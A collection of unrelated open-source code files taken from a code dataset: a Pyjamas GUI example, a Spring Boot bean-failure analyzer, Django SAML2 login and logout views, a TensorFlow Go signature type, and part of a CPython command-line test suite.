elif command == 'align':
data = space_split(data)
vert = data[0]
horiz = data[1]
if vert != '-':
cf.setVerticalAlignment(row, col, vert)
if horiz != '-':
cf.setHorizontalAlignment(row, col, horiz)
elif command == 'cellspan':
data = space_split(data)
rowspan = data[0]
colspan = data[1]
if colspan != '-':
cf.setColSpan(row, col, colspan)
if rowspan != '-':
cf.setRowSpan(row, col, rowspan)
def formatCell(self, row, col):
self.grid.prepareCell(row, col)
if col == 0 and row != 0:
self.grid.setHTML(row, col, "%d" % row)
if row != 0 and col != 0:
#self.grid.setHTML(row, col, " ")
fmt = "rightpanel-cellformat"
if col == 0 and row == 0:
fmt = "rightpanel-cellcornerformat"
elif row == 0:
fmt = "rightpanel-celltitleformat"
elif col == 0:
fmt = "rightpanel-cellleftformat"
self.grid.getCellFormatter().setStyleName(row, col, fmt)
class RightPanel(DockPanel):
def __init__(self):
DockPanel.__init__(self)
self.grids = {}
self.g = Grid()
self.g.setCellSpacing("0px")
self.g.setCellPadding("8px")
self.title = HTML(" ")
self.title.setStyleName("rightpanel-title")
self.add(self.title, DockPanel.NORTH)
self.setCellWidth(self.title, "100%")
self.setCellHorizontalAlignment(self.title,
HasHorizontalAlignment.ALIGN_LEFT)
self.add(self.g, DockPanel.CENTER)
def setTitle(self, title):
self.title.setHTML(title)
def clear_items(self):
for i in range(len(self.grids)):
g = self.grids[i]
if hasattr(g, "clear_items"):
g.clear_items()
self.grids = {}
self.g.resize(0, 0)
def setup_panels(self, datasets):
self.grids = {}
self.data = {}
self.names = {}
self.loaded = {}
size = len(datasets)
self.g.resize(size, 1)
#for i in range(size):
# item = datasets[i]
# fname = item[0]
# self.grids[i] = RightGrid(fname)
# self.g.setWidget(i, 0, self.grids[i])
def add_html(self, html, name, index):
self.data[index] = html
self.names[index] = name
self.grids[index] = HTML(html)
self.g.setWidget(index, 0, self.grids[index])
def add_items(self, items, name, index):
self.data[index] = items
self.names[index] = name
self.grids[index] = RightGrid("")
self.grids[index].set_items(items)
self.g.setWidget(index, 0, self.grids[index])
class MidPanel(Grid):
def __init__(self, sink):
Grid.__init__(self)
self.resize(1, 1)
self.addTableListener(self)
self.sink = sink
self.selected_row = -1
def set_items(self, items):
if self.selected_row != -1:
self.styleRow(self.selected_row, False)
self.item_names = []
self.item_locations = []
self.resizeRows(len(items))
for i in range(len(items)):
item = items[i]
name = item[0]
location = item[1]
self.setHTML(i, 0, name)
self.item_names.append(name)
self.item_locations.append(location)
def onCellClicked(self, sender, row, col):
self.styleRow(self.selected_row, False)
self.selected_row = row
self.styleRow(self.selected_row, True)
self.sink.select_right_grid(self.item_locations[row],
self.item_names[row])
def styleRow(self, row, selected):
if (row != -1):
if (selected):
self.getRowFormatter().addStyleName(row, "midpanel-SelectedRow")
else:
self.getRowFormatter().removeStyleName(row, "midpanel-SelectedRow")
class InfoDirectory:
def onModuleLoad(self):
self.remote = InfoServicePython()
self.tree_width = 200
self.tp = HorizontalPanel()
self.tp.setWidth("%dpx" % (self.tree_width))
self.treeview = Trees()
self.treeview.fTree.addTreeListener(self)
self.sp = ScrollPanel()
self.tp.add(self.treeview)
self.sp.add(self.tp)
self.sp.setHeight("100%")
self.horzpanel1 = HorizontalPanel()
self.horzpanel1.setSize("100%", "100%")
self.horzpanel1.setBorderWidth(1)
self.horzpanel1.setSpacing("10px")
self.rp = RightPanel()
self.rps = ScrollPanel()
self.rps.add(self.rp)
self.rps.setWidth("100%")
self.rp.setWidth("100%")
self.cp1 = CollapserPanel(self)
self.cp1.setWidget(self.sp)
self.cp1.setHTML(" ")
self.midpanel = MidPanel(self)
self.cp2 = CollapserPanel(self)
self.cp2.setWidget(self.midpanel)
self.cp2.setHTML(" ")
self.horzpanel1.add(self.cp1)
self.horzpanel1.add(self.cp2)
self.horzpanel1.add(self.rps)
self.cp1.setInitialWidth("%dpx" % self.tree_width)
self.cp2.setInitialWidth("200px")
RootPanel().add(self.horzpanel1)
width = Window.getClientWidth()
height = Window.getClientHeight()
self.onWindowResized(width, height)
Window.addWindowResizeListener(self)
def setCollapserWidth(self, widget, width):
self.horzpanel1.setCellWidth(widget, width)
def onWindowResized(self, width, height):
#self.hp.setWidth("%dpx" % (width - self.tree_width))
#self.hp.setHeight("%dpx" % (height - 20))
self.cp1.setHeight("%dpx" % (height - 30))
self.cp2.setHeight("%dpx" % (height - 30))
self.rps.setHeight("%dpx" % (height - 30))
self.horzpanel1.setHeight("%dpx" % (height - 20))
def onTreeItemStateChanged(self, item):
if item.isSelected():
self.onTreeItemSelected(item)
def onTreeItemSelected(self, item):
obj = item.getUserObject()
if len(obj.children) != 0:
self.clear_mid_panel()
return
self.remote.get_midpanel_data(obj.root + "/" + obj.text, self)
self.cp2.setHTML(obj.text)
self.clear_right_panel()
def clear_right_panel(self):
self.horzpanel1.remove(2)
self.horzpanel1.insert(HTML(""), 2)
self.rp.setTitle(" ")
def clear_mid_panel(self):
self.clear_right_panel()
#self.horzpanel2.setLeftWidget(HTML(""))
def set_mid_panel(self, response):
self.midpanel.set_items(response)
self.cp2.setWidget(self.midpanel)
def select_right_grid(self, location, name):
self.horzpanel1.remove(2)
self.horzpanel1.insert(self.rps, 2)
self.rp.setTitle(name)
self.remote.get_rightpanel_datanames(location, self)
def get_rightpanel_datasets(self, datasets):
self.rp.clear_items()
self.rp.setup_panels(datasets)
for i in range(len(datasets)):
item = datasets[i]
fname = item[0]
self.remote.get_rightpanel_data(fname, fname, i, self)
def fill_right_grid(self, data):
index = data.get('index')
name = data.get('name')
if data.has_key('items'):
self.rp.add_items(data.get('items'), name, index)
elif data.has_key('html'):
self.rp.add_html(data.get('html'), name, index)
def onRemoteResponse(self, response, request_info):
method = request_info.method
if method == "get_midpanel_data":
self.set_mid_panel(response)
elif method == "get_rightpanel_datanames":
self.get_rightpanel_datasets(response)
elif method == "get_rightpanel_data":
self.fill_right_grid(response)
def onRemoteError(self, code, message, request_info):
RootPanel().add(HTML("Server Error or Invalid Response: ERROR " + code))
RootPanel().add(HTML(message))
class InfoServicePython(JSONProxy):
def __init__(self):
JSONProxy.__init__(self, "services/EchoService.py",
["get_midpanel_data",
"get_rightpanel_datanames",
"get_rightpanel_data"])
if __name__ == '__main__':
pyjd.setup("http://127.0.0.1/examples/infohierarchy/public/InfoDirectory.html")
app = InfoDirectory()
app.onModuleLoad()
pyjd.run()
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Copyright 2012-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot.autoconfigure.diagnostics.analyzer;
import java.lang.annotation.Annotation;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Set;
import org.jspecify.annotations.Nullable;
import org.springframework.beans.factory.BeanFactory;
import org.springframework.beans.factory.BeanFactoryUtils;
import org.springframework.beans.factory.InjectionPoint;
import org.springframework.beans.factory.NoSuchBeanDefinitionException;
import org.springframework.beans.factory.UnsatisfiedDependencyException;
import org.springframework.beans.factory.annotation.AnnotatedBeanDefinition;
import org.springframework.beans.factory.config.BeanDefinition;
import org.springframework.beans.factory.config.ConfigurableListableBeanFactory;
import org.springframework.boot.autoconfigure.condition.ConditionEvaluationReport;
import org.springframework.boot.autoconfigure.condition.ConditionEvaluationReport.ConditionAndOutcome;
import org.springframework.boot.autoconfigure.condition.ConditionEvaluationReport.ConditionAndOutcomes;
import org.springframework.boot.autoconfigure.condition.ConditionOutcome;
import org.springframework.boot.diagnostics.FailureAnalysis;
import org.springframework.boot.diagnostics.analyzer.AbstractInjectionFailureAnalyzer;
import org.springframework.context.annotation.Bean;
import org.springframework.core.ResolvableType;
import org.springframework.core.type.MethodMetadata;
import org.springframework.core.type.classreading.CachingMetadataReaderFactory;
import org.springframework.core.type.classreading.MetadataReader;
import org.springframework.core.type.classreading.MetadataReaderFactory;
import org.springframework.util.Assert;
import org.springframework.util.ClassUtils;
/**
* An {@link AbstractInjectionFailureAnalyzer} that performs analysis of failures caused
* by a {@link NoSuchBeanDefinitionException}.
*
* @author Stephane Nicoll
* @author Phillip Webb
* @author Scott Frederick
*/
class NoSuchBeanDefinitionFailureAnalyzer extends AbstractInjectionFailureAnalyzer<NoSuchBeanDefinitionException> {
private final ConfigurableListableBeanFactory beanFactory;
private final MetadataReaderFactory metadataReaderFactory;
private final ConditionEvaluationReport report;
NoSuchBeanDefinitionFailureAnalyzer(BeanFactory beanFactory) {
Assert.isTrue(beanFactory instanceof ConfigurableListableBeanFactory,
"'beanFactory' must be a ConfigurableListableBeanFactory");
this.beanFactory = (ConfigurableListableBeanFactory) beanFactory;
this.metadataReaderFactory = new CachingMetadataReaderFactory(this.beanFactory.getBeanClassLoader());
// Get early as won't be accessible once context has failed to start
this.report = ConditionEvaluationReport.get(this.beanFactory);
}
@Override
protected @Nullable FailureAnalysis analyze(Throwable rootFailure, NoSuchBeanDefinitionException cause,
@Nullable String description) {
if (cause.getNumberOfBeansFound() != 0) {
return null;
}
List<AutoConfigurationResult> autoConfigurationResults = getAutoConfigurationResults(cause);
List<UserConfigurationResult> userConfigurationResults = getUserConfigurationResults(cause);
StringBuilder message = new StringBuilder();
message.append(String.format("%s required %s that could not be found.%n",
(description != null) ? description : "A component", getBeanDescription(cause)));
InjectionPoint injectionPoint = findInjectionPoint(rootFailure);
if (injectionPoint != null) {
Annotation[] injectionAnnotations = injectionPoint.getAnnotations();
if (injectionAnnotations.length > 0) {
message.append(String.format("%nThe injection point has the following annotations:%n"));
for (Annotation injectionAnnotation : injectionAnnotations) {
message.append(String.format("\t- %s%n", injectionAnnotation));
}
}
}
if (!autoConfigurationResults.isEmpty() || !userConfigurationResults.isEmpty()) {
message.append(String.format("%nThe following candidates were found but could not be injected:%n"));
for (AutoConfigurationResult result : autoConfigurationResults) {
message.append(String.format("\t- %s%n", result));
}
for (UserConfigurationResult result : userConfigurationResults) {
message.append(String.format("\t- %s%n", result));
}
}
String action = String.format("Consider %s %s in your configuration.",
(!autoConfigurationResults.isEmpty() || !userConfigurationResults.isEmpty())
? "revisiting the entries above or defining" : "defining",
getBeanDescription(cause));
return new FailureAnalysis(message.toString(), action, cause);
}
private String getBeanDescription(NoSuchBeanDefinitionException cause) {
if (cause.getResolvableType() != null) {
Class<?> type = extractBeanType(cause.getResolvableType());
return "a bean of type '" + type.getName() + "'";
}
return "a bean named '" + cause.getBeanName() + "'";
}
private Class<?> extractBeanType(ResolvableType resolvableType) {
Class<?> rawClass = resolvableType.getRawClass();
Assert.state(rawClass != null, "'rawClass' must not be null");
return rawClass;
}
private List<AutoConfigurationResult> getAutoConfigurationResults(NoSuchBeanDefinitionException cause) {
List<AutoConfigurationResult> results = new ArrayList<>();
collectReportedConditionOutcomes(cause, results);
collectExcludedAutoConfiguration(cause, results);
return results;
}
private List<UserConfigurationResult> getUserConfigurationResults(NoSuchBeanDefinitionException cause) {
ResolvableType type = cause.getResolvableType();
if (type == null) {
return Collections.emptyList();
}
String[] beanNames = BeanFactoryUtils.beanNamesForTypeIncludingAncestors(this.beanFactory, type);
return Arrays.stream(beanNames)
.map((beanName) -> new UserConfigurationResult(getFactoryMethodMetadata(beanName),
this.beanFactory.getBean(beanName).equals(null)))
.toList();
}
private @Nullable MethodMetadata getFactoryMethodMetadata(String beanName) {
BeanDefinition beanDefinition = this.beanFactory.getBeanDefinition(beanName);
if (beanDefinition instanceof AnnotatedBeanDefinition annotatedBeanDefinition) {
return annotatedBeanDefinition.getFactoryMethodMetadata();
}
return null;
}
private void collectReportedConditionOutcomes(NoSuchBeanDefinitionException cause,
List<AutoConfigurationResult> results) {
this.report.getConditionAndOutcomesBySource()
.forEach((source, sourceOutcomes) -> collectReportedConditionOutcomes(cause, new Source(source),
sourceOutcomes, results));
}
private void collectReportedConditionOutcomes(NoSuchBeanDefinitionException cause, Source source,
ConditionAndOutcomes sourceOutcomes, List<AutoConfigurationResult> results) {
if (sourceOutcomes.isFullMatch()) {
return;
}
BeanMethods methods = new BeanMethods(source, cause);
for (ConditionAndOutcome conditionAndOutcome : sourceOutcomes) {
if (!conditionAndOutcome.getOutcome().isMatch()) {
for (MethodMetadata method : methods) {
results.add(new AutoConfigurationResult(method, conditionAndOutcome.getOutcome()));
}
}
}
}
private void collectExcludedAutoConfiguration(NoSuchBeanDefinitionException cause,
List<AutoConfigurationResult> results) {
for (String excludedClass : this.report.getExclusions()) {
Source source = new Source(excludedClass);
BeanMethods methods = new BeanMethods(source, cause);
for (MethodMetadata method : methods) {
String message = String.format("auto-configuration '%s' was excluded",
ClassUtils.getShortName(excludedClass));
results.add(new AutoConfigurationResult(method, new ConditionOutcome(false, message)));
}
}
}
private @Nullable InjectionPoint findInjectionPoint(Throwable failure) {
UnsatisfiedDependencyException unsatisfiedDependencyException = findCause(failure,
UnsatisfiedDependencyException.class);
if (unsatisfiedDependencyException == null) {
return null;
}
return unsatisfiedDependencyException.getInjectionPoint();
}
private static class Source {
private final String className;
private final @Nullable String methodName;
Source(String source) {
String[] tokens = source.split("#");
this.className = (tokens.length > 1) ? tokens[0] : source;
this.methodName = (tokens.length != 2) ? null : tokens[1];
}
String getClassName() {
return this.className;
}
@Nullable String getMethodName() {
return this.methodName;
}
}
private class BeanMethods implements Iterable<MethodMetadata> {
private final List<MethodMetadata> methods;
BeanMethods(Source source, NoSuchBeanDefinitionException cause) {
this.methods = findBeanMethods(source, cause);
}
private List<MethodMetadata> findBeanMethods(Source source, NoSuchBeanDefinitionException cause) {
try {
MetadataReader classMetadata = NoSuchBeanDefinitionFailureAnalyzer.this.metadataReaderFactory
.getMetadataReader(source.getClassName());
Set<MethodMetadata> candidates = classMetadata.getAnnotationMetadata()
.getAnnotatedMethods(Bean.class.getName());
List<MethodMetadata> result = new ArrayList<>();
for (MethodMetadata candidate : candidates) {
if (isMatch(candidate, source, cause)) {
result.add(candidate);
}
}
return Collections.unmodifiableList(result);
}
catch (Exception ex) {
return Collections.emptyList();
}
}
private boolean isMatch(MethodMetadata candidate, Source source, NoSuchBeanDefinitionException cause) {
if (source.getMethodName() != null && !source.getMethodName().equals(candidate.getMethodName())) {
return false;
}
String name = cause.getBeanName();
ResolvableType resolvableType = cause.getResolvableType();
return ((name != null && hasName(candidate, name))
|| (resolvableType != null && hasType(candidate, extractBeanType(resolvableType))));
}
private boolean hasName(MethodMetadata methodMetadata, String name) {
Map<String, @Nullable Object> attributes = methodMetadata.getAnnotationAttributes(Bean.class.getName());
String[] candidates = (attributes != null) ? (String[]) attributes.get("name") : null;
if (candidates != null) {
for (String candidate : candidates) {
if (candidate.equals(name)) {
return true;
}
}
return false;
}
return methodMetadata.getMethodName().equals(name);
}
private boolean hasType(MethodMetadata candidate, Class<?> type) {
String returnTypeName = candidate.getReturnTypeName();
if (type.getName().equals(returnTypeName)) {
return true;
}
try {
Class<?> returnType = ClassUtils.forName(returnTypeName,
NoSuchBeanDefinitionFailureAnalyzer.this.beanFactory.getBeanClassLoader());
return type.isAssignableFrom(returnType);
}
catch (Throwable ex) {
return false;
}
}
@Override
public Iterator<MethodMetadata> iterator() {
return this.methods.iterator();
}
}
private static class AutoConfigurationResult {
private final MethodMetadata methodMetadata;
private final ConditionOutcome conditionOutcome;
AutoConfigurationResult(MethodMetadata methodMetadata, ConditionOutcome conditionOutcome) {
this.methodMetadata = methodMetadata;
this.conditionOutcome = conditionOutcome;
}
@Override
public String toString() {
return String.format("Bean method '%s' in '%s' not loaded because %s", this.methodMetadata.getMethodName(),
ClassUtils.getShortName(this.methodMetadata.getDeclaringClassName()),
this.conditionOutcome.getMessage());
}
}
private static class UserConfigurationResult {
private final @Nullable MethodMetadata methodMetadata;
private final boolean nullBean;
UserConfigurationResult(@Nullable MethodMetadata methodMetadata, boolean nullBean) {
this.methodMetadata = methodMetadata;
this.nullBean = nullBean;
}
@Override
public String toString() {
StringBuilder sb = new StringBuilder("User-defined bean");
if (this.methodMetadata != null) {
sb.append(String.format(" method '%s' in '%s'", this.methodMetadata.getMethodName(),
ClassUtils.getShortName(this.methodMetadata.getDeclaringClassName())));
}
if (this.nullBean) {
sb.append(" ignored as the bean value is null");
}
return sb.toString();
}
}
}
|
java
|
github
|
https://github.com/spring-projects/spring-boot
|
core/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/diagnostics/analyzer/NoSuchBeanDefinitionFailureAnalyzer.java
|
import base64
import logging
from django.conf import settings
from django.contrib import auth
from django.core.exceptions import ValidationError
from django.http import HttpResponse, HttpResponseRedirect, JsonResponse
from django.utils.six import text_type
from django.utils.translation import ugettext_lazy as _
from djangosaml2.cache import IdentityCache, OutstandingQueriesCache, StateCache
from djangosaml2.conf import get_config
from djangosaml2.signals import post_authenticated
from djangosaml2.utils import get_custom_setting, get_location
from djangosaml2.views import _get_subject_id, _set_subject_id
from rest_framework.authtoken.models import Token
from rest_framework.generics import ListAPIView
from rest_framework.views import APIView
from saml2 import BINDING_HTTP_POST, BINDING_HTTP_REDIRECT, md
from saml2.client import Saml2Client
from saml2.metadata import do_extensions, entity_descriptor
from saml2.response import StatusRequestDenied
from saml2.xmldsig import DIGEST_SHA1, SIG_RSA_SHA1
from waldur_core.core.views import (
RefreshTokenMixin,
login_completed,
login_failed,
logout_completed,
logout_failed,
validate_authentication_method,
)
from . import filters, models, serializers, utils
from .log import event_logger
logger = logging.getLogger(__name__)
validate_saml2 = validate_authentication_method('SAML2')
def metadata(request, config_loader_path=None, valid_for=None):
"""Returns an XML with the SAML 2.0 metadata for this
SP as configured in the settings.py file.
"""
conf = get_config(config_loader_path, request)
metadata = entity_descriptor(conf)
if conf.extensions:
if metadata.extensions is None:
metadata.extensions = md.Extensions()
for key, val in conf.extensions.items():
_ext = do_extensions(key, val)
if _ext:
for _e in _ext:
metadata.extensions.add_extension_element(_e)
return HttpResponse(
content=text_type(metadata).encode('utf-8'),
content_type="text/xml; charset=utf8",
)
class BaseSaml2View(APIView):
throttle_classes = ()
permission_classes = ()
authentication_classes = ()
class Saml2LoginView(BaseSaml2View):
"""
SAML Authorization endpoint
This view receives authorization requests from users and
redirects them to corresponding IdP authorization page.
The "metadata" has to be set in SAML_CONFIG in settings.py
"""
serializer_class = serializers.Saml2LoginSerializer
@validate_saml2
def post(self, request):
if not self.request.user.is_anonymous:
error_message = _('This endpoint is for anonymous users only.')
return JsonResponse({'error_message': error_message}, status=400)
serializer = self.serializer_class(data=request.data)
serializer.is_valid(raise_exception=True)
idp = serializer.validated_data.get('idp')
conf = get_config(request=request)
# ensure our selected binding is supported by the IDP
supported_bindings = utils.get_idp_sso_supported_bindings(idp, config=conf)
default_binding = settings.WALDUR_AUTH_SAML2.get('DEFAULT_BINDING')
if default_binding in supported_bindings:
binding = default_binding
elif BINDING_HTTP_POST in supported_bindings:
binding = BINDING_HTTP_POST
elif BINDING_HTTP_REDIRECT in supported_bindings:
binding = BINDING_HTTP_REDIRECT
else:
error_message = _('Identity provider does not support available bindings.')
return JsonResponse({'error_message': error_message}, status=400)
client = Saml2Client(conf)
kwargs = {}
sign_requests = getattr(conf, '_sp_authn_requests_signed', False)
if sign_requests:
signature_algorithm = (
settings.WALDUR_AUTH_SAML2.get('signature_algorithm') or SIG_RSA_SHA1
)
digest_algorithm = (
settings.WALDUR_AUTH_SAML2.get('digest_algorithm') or DIGEST_SHA1
)
kwargs['sign'] = True
kwargs['sigalg'] = signature_algorithm
kwargs['sign_alg'] = signature_algorithm
kwargs['digest_alg'] = digest_algorithm
nameid_format = settings.WALDUR_AUTH_SAML2.get('nameid_format')
if nameid_format or nameid_format == "": # "" is a valid setting in pysaml2
kwargs['nameid_format'] = nameid_format
if binding == BINDING_HTTP_REDIRECT:
session_id, result = client.prepare_for_authenticate(
entityid=idp, binding=binding, **kwargs
)
data = {
'binding': 'redirect',
'url': get_location(result),
}
elif binding == BINDING_HTTP_POST:
try:
location = client.sso_location(idp, binding)
except TypeError:
error_message = _('Invalid identity provider specified.')
return JsonResponse({'error_message': error_message}, status=400)
session_id, request_xml = client.create_authn_request(
location, binding=binding, **kwargs
)
data = {
'binding': 'post',
'url': location,
'request': str(base64.b64encode(request_xml.encode('UTF-8')), 'utf-8'),
}
# save session_id
oq_cache = OutstandingQueriesCache(request.session)
oq_cache.set(session_id, '')
return JsonResponse(data)
class Saml2LoginCompleteView(RefreshTokenMixin, BaseSaml2View):
"""
SAML Authorization Response endpoint
The IdP will send its response to this view, which
will process it with pysaml2 help and log the user
in using the custom Authorization backend
djangosaml2.backends.Saml2Backend that should be
enabled in the settings.py
"""
serializer_class = serializers.Saml2LoginCompleteSerializer
@validate_saml2
def post(self, request):
serializer = self.serializer_class(data=request.data)
serializer.is_valid(raise_exception=True)
attribute_mapping = get_custom_setting(
'SAML_ATTRIBUTE_MAPPING', {'uid': ('username',)}
)
create_unknown_user = get_custom_setting('SAML_CREATE_UNKNOWN_USER', True)
conf = get_config(request=request)
client = Saml2Client(conf, identity_cache=IdentityCache(request.session))
oq_cache = OutstandingQueriesCache(request.session)
outstanding_queries = oq_cache.outstanding_queries()
xmlstr = serializer.validated_data['SAMLResponse']
# process the authentication response
try:
response = client.parse_authn_request_response(
xmlstr, BINDING_HTTP_POST, outstanding_queries
)
except Exception as e:
if isinstance(e, StatusRequestDenied):
return login_failed(
_(
'Authentication request has been denied by identity provider. '
'Please check your credentials.'
)
)
logger.error('SAML response parsing failed %s' % e)
return login_failed(_('SAML2 response has errors.'))
if response is None:
logger.error('SAML response is None')
return login_failed(_('SAML response has errors. Please check the logs'))
if response.assertion is None:
logger.error('SAML response assertion is None')
return login_failed(_('SAML response has errors. Please check the logs'))
session_id = response.session_id()
oq_cache.delete(session_id)
# authenticate the remote user
session_info = response.session_info()
if callable(attribute_mapping):
attribute_mapping = attribute_mapping()
if callable(create_unknown_user):
create_unknown_user = create_unknown_user()
try:
user = auth.authenticate(
request=request, # AxesBackend requires request for authentication
session_info=session_info,
attribute_mapping=attribute_mapping,
create_unknown_user=create_unknown_user,
)
except ValidationError as e:
return login_failed(e.message)
if user is None:
return login_failed(_('SAML2 authentication failed.'))
registration_method = settings.WALDUR_AUTH_SAML2.get('name', 'saml2')
if user.registration_method != registration_method:
user.registration_method = registration_method
user.save(update_fields=['registration_method'])
# required for validating SAML2 logout requests
auth.login(request, user)
_set_subject_id(request.session, session_info['name_id'])
logger.debug('User %s authenticated via SSO.', user)
logger.debug('Sending the post_authenticated signal')
post_authenticated.send_robust(sender=user, session_info=session_info)
token = self.refresh_token(user)
logger.info(
'Authenticated with SAML token. Returning token for successful login of user %s',
user,
)
event_logger.saml2_auth.info(
'User {user_username} with full name {user_full_name} logged in successfully with SAML2.',
event_type='auth_logged_in_with_saml2',
event_context={'user': user},
)
return login_completed(token.key, 'saml2')
class Saml2LogoutView(BaseSaml2View):
"""
SAML Logout endpoint
This view redirects users to corresponding IdP page for the logout.
"""
@validate_saml2
def get(self, request):
state = StateCache(request.session)
conf = get_config(request=request)
client = Saml2Client(
conf, state_cache=state, identity_cache=IdentityCache(request.session)
)
subject_id = _get_subject_id(request.session)
if subject_id is None:
return logout_failed(_('You cannot be logged out.'))
try:
result = client.global_logout(subject_id)
except KeyError:
return logout_failed(_('You are not logged in any IdP/AA.'))
state.sync()
if not result:
return logout_failed(_('You are not logged in any IdP/AA.'))
# Logout is supported only from 1 IdP
binding, http_info = list(result.values())[0]
return HttpResponseRedirect(get_location(http_info))
class Saml2LogoutCompleteView(BaseSaml2View):
"""
SAML Logout Response endpoint
The IdP will send its response to this view, which
will logout the user and remove authorization token.
"""
serializer_class = serializers.Saml2LogoutCompleteSerializer
@validate_saml2
def get(self, request):
"""
For IdPs which send GET requests
"""
serializer = self.serializer_class(data=request.GET)
serializer.is_valid(raise_exception=True)
return self.logout(request, serializer.validated_data, BINDING_HTTP_REDIRECT)
@validate_saml2
def post(self, request):
"""
For IdPs which send POST requests
"""
serializer = self.serializer_class(data=request.POST)
serializer.is_valid(raise_exception=True)
return self.logout(request, serializer.validated_data, BINDING_HTTP_POST)
def logout(self, request, data, binding):
conf = get_config(request=request)
state = StateCache(request.session)
client = Saml2Client(
conf, state_cache=state, identity_cache=IdentityCache(request.session)
)
if 'SAMLResponse' in data:
# Logout started by us
client.parse_logout_request_response(data['SAMLResponse'], binding)
http_response = logout_completed()
else:
# Logout started by IdP
subject_id = _get_subject_id(request.session)
if subject_id is None:
http_response = logout_completed()
else:
http_info = client.handle_logout_request(
data['SAMLRequest'],
subject_id,
binding,
relay_state=data.get('RelayState', ''),
)
http_response = HttpResponseRedirect(get_location(http_info))
state.sync()
user = request.user
if user.is_anonymous:
return http_response
Token.objects.get(user=user).delete()
auth.logout(request)
event_logger.saml2_auth.info(
'User {user_username} with full name {user_full_name} logged out successfully with SAML2.',
event_type='auth_logged_out_with_saml2',
event_context={'user': user},
)
return http_response
class Saml2ProviderView(ListAPIView):
throttle_classes = ()
permission_classes = ()
serializer_class = serializers.Saml2ProviderSerializer
queryset = models.IdentityProvider.objects.all()
filterset_class = filters.IdentityProviderFilter
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
Copyright 2019 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package tensorflow
import corepb "github.com/tensorflow/tensorflow/tensorflow/go/core/protobuf/for_core_protos_go_proto"
// #include "tensorflow/c/c_api.h"
import "C"
// A Signature defines the signature of a computation supported by a TensorFlow
// graph.
//
// For example, a model with two loss computations, sharing a single input,
// might have the following signature_def map.
//
// Note that across the two Signatures "loss_A" and "loss_B", the input key,
// output key, and method_name are identical, and will be used by system(s) that
// implement or rely upon this particular loss method. The output tensor names
// differ, demonstrating how different outputs can exist for the same method.
//
// signature_def {
// key: "loss_A"
// value {
// inputs {
// key: "input"
// value {
// name: "input:0"
// dtype: DT_STRING
// tensor_shape: ...
// }
// }
// outputs {
// key: "loss_output"
// value {
// name: "loss_output_A:0"
// dtype: DT_FLOAT
// tensor_shape: ...
// }
// }
// }
// ...
// method_name: "some/package/compute_loss"
// }
// signature_def {
// key: "loss_B"
// value {
// inputs {
// key: "input"
// value {
// name: "input:0"
// dtype: DT_STRING
// tensor_shape: ...
// }
// }
// outputs {
// key: "loss_output"
// value {
// name: "loss_output_B:0"
// dtype: DT_FLOAT
// tensor_shape: ...
// }
// }
// }
// ...
// method_name: "some/package/compute_loss"
// }
type Signature struct {
Inputs, Outputs map[string]TensorInfo
MethodName string
}
// A TensorInfo contains the information about a Tensor necessary for feeding or retrieval.
type TensorInfo struct {
Name string
DType DataType
Shape Shape
}
func signatureDefFromProto(pb *corepb.SignatureDef) Signature {
inputs := make(map[string]TensorInfo)
for name, input := range pb.GetInputs() {
inputs[name] = tensorInfoFromProto(input)
}
outputs := make(map[string]TensorInfo)
for name, output := range pb.GetOutputs() {
outputs[name] = tensorInfoFromProto(output)
}
return Signature{
Inputs: inputs,
Outputs: outputs,
MethodName: pb.GetMethodName(),
}
}
func tensorInfoFromProto(pb *corepb.TensorInfo) TensorInfo {
var dims []int64
for _, d := range pb.GetTensorShape().GetDim() {
dims = append(dims, d.GetSize())
}
return TensorInfo{
Name: pb.GetName(),
DType: DataType(C.TF_DataType(pb.GetDtype())),
Shape: MakeShape(dims...),
}
}
|
go
|
github
|
https://github.com/tensorflow/tensorflow
|
tensorflow/go/signature.go
|
# Tests invocation of the interpreter with various command line arguments
# Most tests are executed with environment variables ignored
# See test_cmd_line_script.py for testing of script execution
import test.support, unittest
import os
import sys
import subprocess
import tempfile
from test.script_helper import spawn_python, kill_python, assert_python_ok, assert_python_failure
# XXX (ncoghlan): Move to script_helper and make consistent with run_python
def _kill_python_and_exit_code(p):
data = kill_python(p)
returncode = p.wait()
return data, returncode
class CmdLineTest(unittest.TestCase):
def test_directories(self):
assert_python_failure('.')
assert_python_failure('< .')
def verify_valid_flag(self, cmd_line):
rc, out, err = assert_python_ok(*cmd_line)
self.assertTrue(out == b'' or out.endswith(b'\n'))
self.assertNotIn(b'Traceback', out)
self.assertNotIn(b'Traceback', err)
def test_optimize(self):
self.verify_valid_flag('-O')
self.verify_valid_flag('-OO')
def test_q(self):
self.verify_valid_flag('-Qold')
self.verify_valid_flag('-Qnew')
self.verify_valid_flag('-Qwarn')
self.verify_valid_flag('-Qwarnall')
def test_site_flag(self):
self.verify_valid_flag('-S')
def test_usage(self):
rc, out, err = assert_python_ok('-h')
self.assertIn(b'usage', out)
def test_version(self):
version = ('Python %d.%d' % sys.version_info[:2]).encode("ascii")
rc, out, err = assert_python_ok('-V')
self.assertTrue(err.startswith(version))
def test_verbose(self):
# -v causes imports to write to stderr. If the write to
# stderr itself causes an import to happen (for the output
# codec), a recursion loop can occur.
rc, out, err = assert_python_ok('-v')
self.assertNotIn(b'stack overflow', err)
rc, out, err = assert_python_ok('-vv')
self.assertNotIn(b'stack overflow', err)
def test_xoptions(self):
rc, out, err = assert_python_ok('-c', 'import sys; print(sys._xoptions)')
opts = eval(out.splitlines()[0])
self.assertEqual(opts, {})
rc, out, err = assert_python_ok(
'-Xa', '-Xb=c,d=e', '-c', 'import sys; print(sys._xoptions)')
